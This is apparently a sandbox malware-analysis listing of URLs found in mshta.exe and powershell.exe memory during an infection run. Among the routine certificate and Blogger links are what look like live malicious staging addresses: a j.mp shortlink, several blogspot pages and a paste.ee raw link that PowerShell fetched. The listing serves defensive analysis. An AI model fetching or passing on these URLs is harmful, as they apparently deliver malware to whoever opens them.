Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: http://j.mp/
Source: mshta.exe, 00000006.00000003.2264502398.00000000003F5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269237459.0000000000430000.00000004.00000020.sdmp | String found in binary or memory: http://j.mp/dbgghasdnasdjasgdakgsdhv
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gs
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/g
Source: mshta.exe, 00000006.00000002.2307607404.0000000005853000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: mshta.exe, 00000006.00000003.2250091244.0000000003B4B000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt05
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0C
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: http://schema.org/BlogPosting
Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2231119435.0000000004080000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2243633505.0000000008621000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308627180.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: http://www.blogger.com/go/cookiechoices
Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp | String found in binary or memory: http://www.cookiechoices.org/
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmp | String found in binary or memory: https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhtt
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://apis.google.com
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp | String found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262198982.00000000001B3000.00000004.00000001.sdmp | String found in binary or memory: https://backbones1234511a.blogspot.com/p/stback1.html
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?lang=en-GB&family=Product
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp | String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://i18n-cloud.appspot.com
Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogs
Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot
Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/
Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/(
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/Q
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.ico
Source: mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.icoe
Source: mshta.exe, 00000006.00000003.2262320859.00000000001CA000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/p
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultA
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultng
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.js
Source: mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsA
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsi
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsp
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jspnga
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/
Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/----
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/X
Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/nap
Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html%26bpli%3D1&followup=https://www.blogger.com/blogi
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html.
Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html...
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html0E)
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html5
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html?interstitial=ABqL8_iitRI9UzgP0mZhOmXtKCBQT4eYHp3t
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlC
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlD
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlK
Source: mshta.exe, 00000006.00000003.2220203351.0000000003474000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlabbr
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlcomment_from_post_iframe.js
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmld
Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdja
Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhv
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
Source: mshta.exe, 00000006.00000003.2252538010.0000000002DE3000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlhttps://www.blogger.com/static/v1/jsbin/376796862-
Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlkj
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmls
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlse
Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlte
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlvg
Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlw
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlwidgets.js91100&pageID=8792113328696570758
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/search
Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.com/searchhttps://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp | String found in binary or memory: https://mainjigijigi123.blogspot.cost2222.html
Source: powershell.exe, 0000000C.00000002.2240980870.000000000036F000.00000004.00000020.sdmp | String found in binary or memory: https://paste.ee/r/9IDWy
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: mshta.exe, 00000011.00000003.2221428662.0000000000125000.00000004.00000001.sdmp | String found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.html
Source: mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmp | String found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.htmlC:
Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250127920.0000000003B45000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307664079.0000000005858000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png:
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.co
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gifogID=9116518222795791100&zx=6c18238f-a384-4
Source: mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png#
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png;
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngk
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngq
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngrom_post_iframe.js
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
Source: mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp | String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone14.html
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.com/intent/tweet?text=
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com
